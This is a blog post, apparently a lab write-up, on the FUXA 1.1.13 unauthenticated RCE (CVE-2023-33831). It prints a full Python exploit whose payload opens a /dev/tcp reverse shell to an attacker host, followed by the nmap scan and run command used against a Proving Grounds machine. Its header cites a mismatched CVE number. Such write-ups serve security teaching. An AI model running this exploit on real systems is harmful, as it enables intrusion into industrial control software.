{"id":625,"date":"2024-05-09T18:59:51","date_gmt":"2024-05-09T23:59:51","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=625"},"modified":"2024-05-09T19:02:47","modified_gmt":"2024-05-10T00:02:47","slug":"cve-2023-33831","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","title":{"rendered":"CVE-2023-33831"},"content":{"rendered":"\n

This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript<\/strong><\/mark> endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for remote code execution. The affected route is \/api\/runscript, where, it is possible to execute commands without authenticating through the code parameter via the POST method using the child_process module via the exec function.<\/p>\n\n\n\n

FUXA<\/a> is a web-based Process Visualization (SCADA\/HMI\/Dashboard) software. With FUXA you can create modern process visualizations with individual designs for your machines and real-time data display. <\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n

You can read more about it on GitHub<\/a>.<\/p>\n\n\n\n

This Python exploit<\/a> on GitHub showcases how effortlessly this can be exploited to obtain root access on the machine. The Python script can be seen below:<\/p>\n\n\n\n

<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
# Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)<\/span><\/span>\n# Date: 18\/04\/2023<\/span><\/span>\n# Exploit Author: Rodolfo Mariano<\/span><\/span>\n# Vendor Homepage: https:\/\/github.com\/frangoteam\/FUXA<\/span><\/span>\n# Version: FUXA V.1.1.13-1186<\/span><\/span>\n# CVE: CVE-2022-26134<\/span><\/span>\n# https:\/\/github.com\/rodolfomarianocy\/<\/span><\/span>\n<\/span>\nfrom<\/span> argparse <\/span>import<\/span> RawTextHelpFormatter<\/span><\/span>\nimport<\/span> argparse, requests<\/span><\/span>\n<\/span>\ndef<\/span> <\/span>main<\/span>(<\/span>rhost<\/span>, <\/span>rport<\/span>, <\/span>lhost<\/span>, <\/span>lport<\/span>):<\/span><\/span>\n    url <\/span>=<\/span> <\/span>"http:\/\/"<\/span>+<\/span>rhost<\/span>+<\/span>":"<\/span>+<\/span>rport<\/span>+<\/span>"\/api\/runscript"<\/span><\/span>\n    payload <\/span>=<\/span> {<\/span><\/span>\n        <\/span>"headers"<\/span>:<\/span><\/span>\n            {<\/span><\/span>\n                <\/span>"normalizedNames"<\/span>:{},<\/span><\/span>\n                <\/span>"lazyUpdate"<\/span>: <\/span>"null"<\/span><\/span>\n            },<\/span><\/span>\n            <\/span>"params"<\/span>:{<\/span><\/span>\n                <\/span>"script"<\/span>:{<\/span><\/span>\n                    <\/span>"parameters"<\/span>:[<\/span><\/span>\n                    {<\/span><\/span>\n                    <\/span>"name"<\/span>:<\/span>"ok"<\/span>,<\/span><\/span>\n                    <\/span>"type"<\/span>:<\/span>"tagid"<\/span>,<\/span><\/span>\n                    <\/span>"value"<\/span>:<\/span>""<\/span><\/span>\n                    }<\/span><\/span>\n                    ],<\/span><\/span>\n                    <\/span>"mode"<\/span>:<\/span>""<\/span>,<\/span><\/span>\n                    <\/span>"id"<\/span>:<\/span>""<\/span>,<\/span><\/span>\n                    <\/span>"test"<\/span>:<\/span>"true"<\/span>,<\/span><\/span>\n                    <\/span>"name"<\/span>:<\/span>"ok"<\/span>,<\/span><\/span>\n                    <\/span>"outputId"<\/span>:<\/span>""<\/span>,<\/span><\/span>\n                    <\/span>"code"<\/span>:<\/span>"require('child_process').exec('\/bin\/bash -c <\/span>\\"<\/span>\/bin\/sh -i >& \/dev\/tcp\/<\/span>%s<\/span>\/<\/span>%s<\/span> 0>&1<\/span>\\"<\/span>')"<\/span> <\/span>%<\/span> (lhost,lport)<\/span><\/span>\n                }<\/span><\/span>\n            }<\/span><\/span>\n        }<\/span><\/span>\n    <\/span>try<\/span>:<\/span><\/span>\n        response <\/span>=<\/span> requests.post(url, <\/span>json<\/span>=<\/span>payload)<\/span><\/span>\n    <\/span>except<\/span> requests.exceptions.ConnectionError:<\/span><\/span>\n        <\/span>print<\/span>(<\/span>"url connection error"<\/span>)<\/span><\/span>\n<\/span>\nparser <\/span>=<\/span> argparse.ArgumentParser(<\/span>formatter_class<\/span>=<\/span>RawTextHelpFormatter, <\/span>usage<\/span>=<\/span>"python exploit.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>"<\/span>)<\/span><\/span>\nparser.add_argument(<\/span>'--rhost'<\/span>, <\/span>dest<\/span>=<\/span>'rhost'<\/span>, <\/span>action<\/span>=<\/span>'store'<\/span>, <\/span>type<\/span>=<\/span>str<\/span>, <\/span>help<\/span>=<\/span>'insert an rhost'<\/span>, <\/span>required<\/span>=<\/span>True<\/span>)<\/span><\/span>\nparser.add_argument(<\/span>'--rport'<\/span>, <\/span>dest<\/span>=<\/span>'rport'<\/span>, <\/span>action<\/span>=<\/span>'store'<\/span>, <\/span>type<\/span>=<\/span>str<\/span>, <\/span>help<\/span>=<\/span>'insert an rport'<\/span>, <\/span>default<\/span>=<\/span>"1881"<\/span>)<\/span><\/span>\nparser.add_argument(<\/span>'--lhost'<\/span>, <\/span>dest<\/span>=<\/span>'lhost'<\/span>, <\/span>action<\/span>=<\/span>'store'<\/span>, <\/span>type<\/span>=<\/span>str<\/span>, <\/span>help<\/span>=<\/span>'insert an lhost'<\/span>, <\/span>required<\/span>=<\/span>True<\/span>)<\/span><\/span>\nparser.add_argument(<\/span>'--lport'<\/span>, <\/span>dest<\/span>=<\/span>'lport'<\/span>, <\/span>action<\/span>=<\/span>'store'<\/span>, <\/span>type<\/span>=<\/span>str<\/span>, <\/span>help<\/span>=<\/span>'insert an lport'<\/span>, <\/span>required<\/span>=<\/span>True<\/span>)<\/span><\/span>\nargs<\/span>=<\/span>parser.parse_args()<\/span><\/span>\n<\/span>\nmain(args.rhost, args.rport, args.lhost, args.lport)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
The script is fairly easy to run and it takes the following arguments:<\/p>\n\n\n\n
    \n
  • The remote host IP address running FUXA V.1.1.13-1186<\/strong><\/mark><\/li>\n\n\n\n
  • The port on which FUXA is running<\/li>\n\n\n\n
  • The attacker machine’s IP<\/li>\n\n\n\n
  • The attacker machine’s listening port<\/li>\n<\/ul>\n\n\n\n
    <\/div>\n\n\n\n
    \n
    I am using a machine from OffSec\u2019s Proving Grounds lab to demonstrate this vulnerbaility<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
    <\/div>\n\n\n\n
    We will need to scan for open ports on the machine to discover the port on which FUXA is running.<\/p>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    \u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/\u2026\/PG Machines\/Practice\/Linux\/CVE-2023-33831<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>nmap<\/span> <\/span>-p22,1881<\/span> <\/span>192.168<\/span>.168.35<\/span> <\/span>-A<\/span> <\/span>-oN<\/span> <\/span>nmap\/cve-2023-33831<\/span><\/span>\nStarting<\/span> <\/span>Nmap<\/span> <\/span>7.94<\/span>SVN<\/span> ( <\/span>https:\/\/nmap.org<\/span> ) at 2024-05-09 18:25 CDT<\/span><\/span>\nNmap<\/span> <\/span>scan<\/span> <\/span>report<\/span> <\/span>for<\/span> <\/span>192.168<\/span>.168.35<\/span><\/span>\nHost<\/span> <\/span>is<\/span> <\/span>up<\/span> (0.052s <\/span>latency<\/span>).<\/span><\/span>\n<\/span>\nPORT<\/span>     <\/span>STATE<\/span> <\/span>SERVICE<\/span> <\/span>VERSION<\/span><\/span>\n22\/tcp<\/span>   <\/span>open<\/span>  <\/span>ssh<\/span>     <\/span>OpenSSH<\/span> <\/span>8.2<\/span>p1<\/span> <\/span>Ubuntu<\/span> <\/span>4<\/span>ubuntu0.9<\/span> (Ubuntu <\/span>Linux<\/span>;<\/span> <\/span>protocol<\/span> <\/span>2.0<\/span>)<\/span><\/span>\n|<\/span> <\/span>ssh-hostkey:<\/span> <\/span><\/span>\n|<\/span>   <\/span>3072<\/span> <\/span>62<\/span>:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38<\/span> (RSA)<\/span><\/span>\n|<\/span>   <\/span>256<\/span> <\/span>ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53<\/span> (ECDSA)<\/span><\/span>\n|<\/span>_<\/span>  <\/span>256<\/span> <\/span>83<\/span>:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8<\/span> (ED25519)<\/span><\/span>\n1881\/tcp<\/span> <\/span>open<\/span>  <\/span>http<\/span>    <\/span>Node.js<\/span> <\/span>Express<\/span> <\/span>framework<\/span><\/span>\n|<\/span>_http-title:<\/span> <\/span>FUXA<\/span><\/span>\n|<\/span>_http-cors:<\/span> <\/span>GET<\/span> <\/span>POST<\/span> <\/span>PUT<\/span> <\/span>DELETE<\/span><\/span>\nService<\/span> <\/span>Info:<\/span> <\/span>OS:<\/span> <\/span>Linux<\/span>;<\/span> <\/span>CPE:<\/span> <\/span>cpe:\/o:linux:linux_kernel<\/span><\/span>\n<\/span>\nService<\/span> <\/span>detection<\/span> <\/span>performed.<\/span> <\/span>Please<\/span> <\/span>report<\/span> <\/span>any<\/span> <\/span>incorrect<\/span> <\/span>results<\/span> <\/span>at<\/span> <\/span>https:\/\/nmap.org\/submit\/<\/span> <\/span>.<\/span><\/span>\nNmap<\/span> <\/span>done:<\/span> <\/span>1<\/span> <\/span>IP<\/span> <\/span>address<\/span> (1 <\/span>host<\/span> <\/span>up<\/span>) scanned <\/span>in<\/span> 13.89 seconds<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    We can see that FUXA is running on port 1881. We have all the information we need to run our script now. Let’s run the script now and obtain a shell on the machine!<\/p>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    \u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/\u2026\/Practice\/Linux\/CVE-2023-33831\/Unauthenticated-RCE-FUXA-CVE-2023-33831<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>python3<\/span> <\/span>CVE-2023-33831.py<\/span> <\/span>--rhost<\/span> <\/span>192.168<\/span>.168.35<\/span> <\/span>--rport<\/span> <\/span>1881<\/span> <\/span>--lhost<\/span> <\/span>192.168<\/span>.45.234<\/span> <\/span>--lport<\/span> <\/span>80<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    <\/div>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,39],"tags":[],"class_list":["post-625","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-cve"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":584,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/","url_meta":{"origin":625,"position":0},"title":"Moniker Link (CVE-2024-21413)","author":"ishsome","date":"March 3, 2024","format":false,"excerpt":"On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE & credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link). Haifei Li of Check Point Research is credited with discovering the vulnerability. The vulnerability bypasses Outlook's security mechanisms when handing a specific type of hyperlink known as a\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":625,"position":1},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":625,"position":2},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":625,"position":3},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":625,"position":4},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":625,"position":5},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=625"}],"version-history":[{"count":2,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions"}],"predecessor-version":[{"id":629,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions\/629"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}